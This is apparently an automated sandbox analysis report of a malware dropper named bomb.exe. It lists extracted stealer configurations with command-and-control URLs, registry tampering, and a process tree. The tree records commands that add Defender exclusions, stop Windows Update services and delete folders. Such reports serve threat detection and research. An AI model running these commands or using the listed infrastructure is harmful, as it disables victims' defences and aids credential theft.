Analysis
-
max time kernel
32s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-10-2024 06:52
Static task
static1
Behavioral task
behavioral1
Sample
bomb.exe
Resource
win7-20240903-en
General
-
Target
bomb.exe
-
Size
12KB
-
MD5
55dba6e7aa4e8cc73415f4e3f9f6bdae
-
SHA1
87c9f29d58f57a5e025061d389be2655ee879d5d
-
SHA256
3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a
-
SHA512
f2eb91e812b2ba58c4309fd44edadc8977367c7d9d6214d7e70a0392ae8427d570746ae57cca68dc260901f664f2e8c6c5387118ff01d243abeb5680abe2a352
-
SSDEEP
192:vnpYaU28zxHdo4ZMgQl9q+4ua7HhdSbwxz1ULU87glpK/b26J4Uf1XXr5:vWZdoWMR96uaLhM6ULU870gJR
Malware Config
Extracted
stealc
cry
http://45.152.113.10
-
url_path
/92335b4816f77e90.php
Extracted
vidar
http://proxy.johnmccrea.com/
https://steamcommunity.com/profiles/76561199780418869
https://t.me/ae5ed
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Extracted
amadey
4.42
550eb4
http://45.202.35.101
-
install_dir
9d94d7e7d6
-
install_file
Hkbsse.exe
-
strings_key
ff6ff15737aa82945cf5241d1644ddb4
-
url_paths
/pLQvfD4d/index.php
Extracted
lumma
https://caffegclasiqwp.shop/api
https://stamppreewntnq.shop/api
https://stagedchheiqwo.shop/api
https://millyscroqwp.shop/api
https://evoliutwoqm.shop/api
https://condedqpwqm.shop/api
https://traineiwnqo.shop/api
https://locatedblsoqp.shop/api
https://awwardwiqi.shop/api
Extracted
stealc
uniq
http://91.202.233.158
-
url_path
/e96ea2db21fa9a1b.php
Extracted
lumma
https://spirittunek.store/api
https://mobbipenju.store/api
https://eaglepawnoy.store/api
https://dissapoiznw.store/api
https://studennotediw.store/api
https://bathdoomgaz.store/api
Signatures
-
Detect Vidar Stealer 15 IoCs
resource yara_rule behavioral2/memory/4916-84-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/4916-83-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/4916-96-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/4916-97-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/4916-156-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/4916-177-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/4916-193-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/4916-196-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/4916-230-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/4916-231-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/4916-238-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/4916-239-0x0000000000400000-0x0000000000676000-memory.dmp family_vidar_v7 behavioral2/memory/1476-279-0x0000000003F90000-0x0000000004206000-memory.dmp family_vidar_v7 behavioral2/memory/1476-281-0x0000000003F90000-0x0000000004206000-memory.dmp family_vidar_v7 behavioral2/memory/1476-280-0x0000000003F90000-0x0000000004206000-memory.dmp family_vidar_v7 -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysvplervcs.exe -
Phorphiex payload 1 IoCs
resource yara_rule behavioral2/files/0x00070000000234d4-23.dat family_phorphiex -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1140 powershell.exe 1012 powershell.exe 2292 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x000700000002354f-767.dat net_reactor behavioral2/memory/4484-775-0x00000000006A0000-0x000000000091E000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation bomb.exe Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation http77.105.161.194file1.exe.exe Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation sysvplervcs.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StorageDrv.url http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe -
Executes dropped EXE 12 IoCs
pid Process 4200 http185.215.113.66pei.exe.exe 4700 http185.215.113.66newtpp.exe.exe 416 http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe 2540 http77.105.161.194file1.exe.exe 4792 httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 2396 sysvplervcs.exe 1572 279127182.exe 1476 Batch.pif 668 GIEBGIIJDG.exe 5000 httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe 3892 httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe -
Loads dropped DLL 2 IoCs
pid Process 4916 MSBuild.exe 4916 MSBuild.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe" http185.215.113.66newtpp.exe.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 151 bitbucket.org 127 raw.githubusercontent.com 130 raw.githubusercontent.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 748 powercfg.exe 5712 powercfg.exe 5724 powercfg.exe 5064 powercfg.exe 3496 powercfg.exe 5028 powercfg.exe 3252 powercfg.exe 1440 powercfg.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2464 tasklist.exe 3052 tasklist.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4792 set thread context of 2700 4792 httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe 91 PID 4156 set thread context of 4916 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 93 PID 416 set thread context of 4072 416 http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe 120 PID 668 set thread context of 4880 668 GIEBGIIJDG.exe 129 -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\PrefersTracks http77.105.161.194file1.exe.exe File opened for modification C:\Windows\ConsideringAttached http77.105.161.194file1.exe.exe File opened for modification C:\Windows\HoneyAmounts http77.105.161.194file1.exe.exe File opened for modification C:\Windows\DevelopedSimulation http77.105.161.194file1.exe.exe File created C:\Windows\sysvplervcs.exe http185.215.113.66newtpp.exe.exe File opened for modification C:\Windows\sysvplervcs.exe http185.215.113.66newtpp.exe.exe File opened for modification C:\Windows\CautionKnife http77.105.161.194file1.exe.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4928 sc.exe 2044 sc.exe 984 sc.exe 1968 sc.exe 5136 sc.exe 3800 sc.exe 2140 sc.exe 3496 sc.exe 5144 sc.exe -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral2/files/0x0008000000023545-682.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4016 4156 WerFault.exe 92 3648 668 WerFault.exe 127 -
System Location Discovery: System Language Discovery 1 TTPs 32 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Batch.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http77.105.161.194file1.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysvplervcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 279127182.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http185.215.113.66pei.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GIEBGIIJDG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http185.215.113.66newtpp.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 3616 timeout.exe 1924 timeout.exe 5892 timeout.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 4916 MSBuild.exe 4916 MSBuild.exe 4916 MSBuild.exe 4916 MSBuild.exe 1140 powershell.exe 1140 powershell.exe 1140 powershell.exe 1476 Batch.pif 1476 Batch.pif 1476 Batch.pif 1476 Batch.pif 1476 Batch.pif 1476 Batch.pif 4916 MSBuild.exe 4916 MSBuild.exe 4916 MSBuild.exe 4916 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4540 bomb.exe Token: SeDebugPrivilege 416 http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 2464 tasklist.exe Token: SeDebugPrivilege 3052 tasklist.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1476 Batch.pif 1476 Batch.pif 1476 Batch.pif -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1476 Batch.pif 1476 Batch.pif 1476 Batch.pif -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4540 wrote to memory of 4200 4540 bomb.exe 85 PID 4540 wrote to memory of 4200 4540 bomb.exe 85 PID 4540 wrote to memory of 4200 4540 bomb.exe 85 PID 4540 wrote to memory of 4700 4540 bomb.exe 86 PID 4540 wrote to memory of 4700 4540 bomb.exe 86 PID 4540 wrote to memory of 4700 4540 bomb.exe 86 PID 4540 wrote to memory of 416 4540 bomb.exe 87 PID 4540 wrote to memory of 416 4540 bomb.exe 87 PID 4540 wrote to memory of 416 4540 bomb.exe 87 PID 4540 wrote to memory of 2540 4540 bomb.exe 88 PID 4540 wrote to memory of 2540 4540 bomb.exe 88 PID 4540 wrote to memory of 2540 4540 bomb.exe 88 PID 4540 wrote to memory of 4792 4540 bomb.exe 89 PID 4540 wrote to memory of 4792 4540 bomb.exe 89 PID 4540 wrote to memory of 4792 4540 bomb.exe 89 PID 4792 wrote to memory of 2700 4792 httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe 91 PID 4792 wrote to memory of 2700 4792 httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe 91 PID 4792 wrote to memory of 2700 4792 httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe 91 PID 4792 wrote to memory of 2700 4792 httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe 91 PID 4792 wrote to memory of 2700 4792 httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe 91 PID 4792 wrote to memory of 2700 4792 httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe 91 PID 4792 wrote to memory of 2700 4792 httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe 91 PID 4792 wrote to memory of 2700 4792 httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe 91 PID 4792 wrote to memory of 2700 4792 httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe 91 PID 4540 wrote to memory of 4156 4540 bomb.exe 92 PID 4540 wrote to memory of 4156 4540 bomb.exe 92 PID 4540 wrote to memory of 4156 4540 bomb.exe 92 PID 4156 wrote to memory of 4916 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 93 PID 4156 wrote to memory of 4916 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 93 PID 4156 wrote to memory of 4916 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 93 PID 4156 wrote to memory of 4916 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 93 PID 4156 wrote to memory of 4916 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 93 PID 4156 wrote to memory of 4916 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 93 PID 4156 wrote to memory of 4916 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 93 PID 4156 wrote to memory of 4916 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 93 PID 4156 wrote to memory of 4916 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 93 PID 4156 wrote to memory of 4916 4156 httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe 93 PID 2540 wrote to memory of 4300 2540 http77.105.161.194file1.exe.exe 97 PID 2540 wrote to memory of 4300 2540 http77.105.161.194file1.exe.exe 97 PID 2540 wrote to memory of 4300 2540 http77.105.161.194file1.exe.exe 97 PID 4700 wrote to memory of 2396 4700 http185.215.113.66newtpp.exe.exe 101 PID 4700 wrote to memory of 2396 4700 http185.215.113.66newtpp.exe.exe 101 PID 4700 wrote to memory of 2396 4700 http185.215.113.66newtpp.exe.exe 101 PID 4200 wrote to memory of 1572 4200 http185.215.113.66pei.exe.exe 102 PID 4200 wrote to memory of 1572 4200 http185.215.113.66pei.exe.exe 102 PID 4200 wrote to memory of 1572 4200 http185.215.113.66pei.exe.exe 102 PID 2396 wrote to memory of 4004 2396 sysvplervcs.exe 104 PID 2396 wrote to memory of 4004 2396 sysvplervcs.exe 104 PID 2396 wrote to memory of 4004 2396 sysvplervcs.exe 104 PID 2396 wrote to memory of 2596 2396 sysvplervcs.exe 106 PID 2396 wrote to memory of 2596 2396 sysvplervcs.exe 106 PID 2396 wrote to memory of 2596 2396 sysvplervcs.exe 106 PID 2596 wrote to memory of 4928 2596 cmd.exe 109 PID 2596 wrote to memory of 4928 2596 cmd.exe 109 PID 2596 wrote to memory of 4928 2596 cmd.exe 109 PID 4004 wrote to memory of 1140 4004 cmd.exe 108 PID 4004 wrote to memory of 1140 4004 cmd.exe 108 PID 4004 wrote to memory of 1140 4004 cmd.exe 108 PID 2596 wrote to memory of 3800 2596 cmd.exe 110 PID 2596 wrote to memory of 3800 2596 cmd.exe 110 PID 2596 wrote to memory of 3800 2596 cmd.exe 110 PID 2596 wrote to memory of 2044 2596 cmd.exe 111 PID 2596 wrote to memory of 2044 2596 cmd.exe 111 PID 2596 wrote to memory of 2044 2596 cmd.exe 111
Processes
-
C:\Users\Admin\AppData\Local\Temp\bomb.exe"C:\Users\Admin\AppData\Local\Temp\bomb.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Users\Admin\AppData\Local\Temp\279127182.exeC:\Users\Admin\AppData\Local\Temp\279127182.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1572
-
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\sysvplervcs.exeC:\Windows\sysvplervcs.exe3⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4928
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3800
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2044
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2140
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3496
-
-
-
C:\Users\Admin\AppData\Local\Temp\1513828492.exeC:\Users\Admin\AppData\Local\Temp\1513828492.exe4⤵PID:5076
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f5⤵PID:5132
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:5160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"5⤵PID:5184
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:5620
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe"C:\Users\Admin\AppData\Local\Temp\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:416 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4072
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.105.161.194file1.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.105.161.194file1.exe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Tits Tits.bat & Tits.bat3⤵
- System Location Discovery: System Language Discovery
PID:4300 -
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"4⤵
- System Location Discovery: System Language Discovery
PID:1112
-
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"4⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4004454⤵
- System Location Discovery: System Language Discovery
PID:3648
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "navyfurthermoreacceptableinvestigator" Profession4⤵
- System Location Discovery: System Language Discovery
PID:3580
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Atmospheric + ..\Commons + ..\Represent + ..\Humans + ..\Href + ..\Router + ..\Connection + ..\Sol O4⤵
- System Location Discovery: System Language Discovery
PID:1808
-
-
C:\Users\Admin\AppData\Local\Temp\400445\Batch.pifBatch.pif O4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1476 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KJEGCFBGDHJJ" & exit5⤵PID:2792
-
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- Delays execution with timeout.exe
PID:5892
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 54⤵
- System Location Discovery: System Language Discovery
PID:2288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2700
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe"C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4916 -
C:\ProgramData\GIEBGIIJDG.exe"C:\ProgramData\GIEBGIIJDG.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:668 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 2685⤵
- Program crash
PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EHIDAKECFIEB" & exit4⤵PID:4484
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
PID:3616
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4156 -s 2523⤵
- Program crash
PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5000 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"3⤵PID:5084
-
-
-
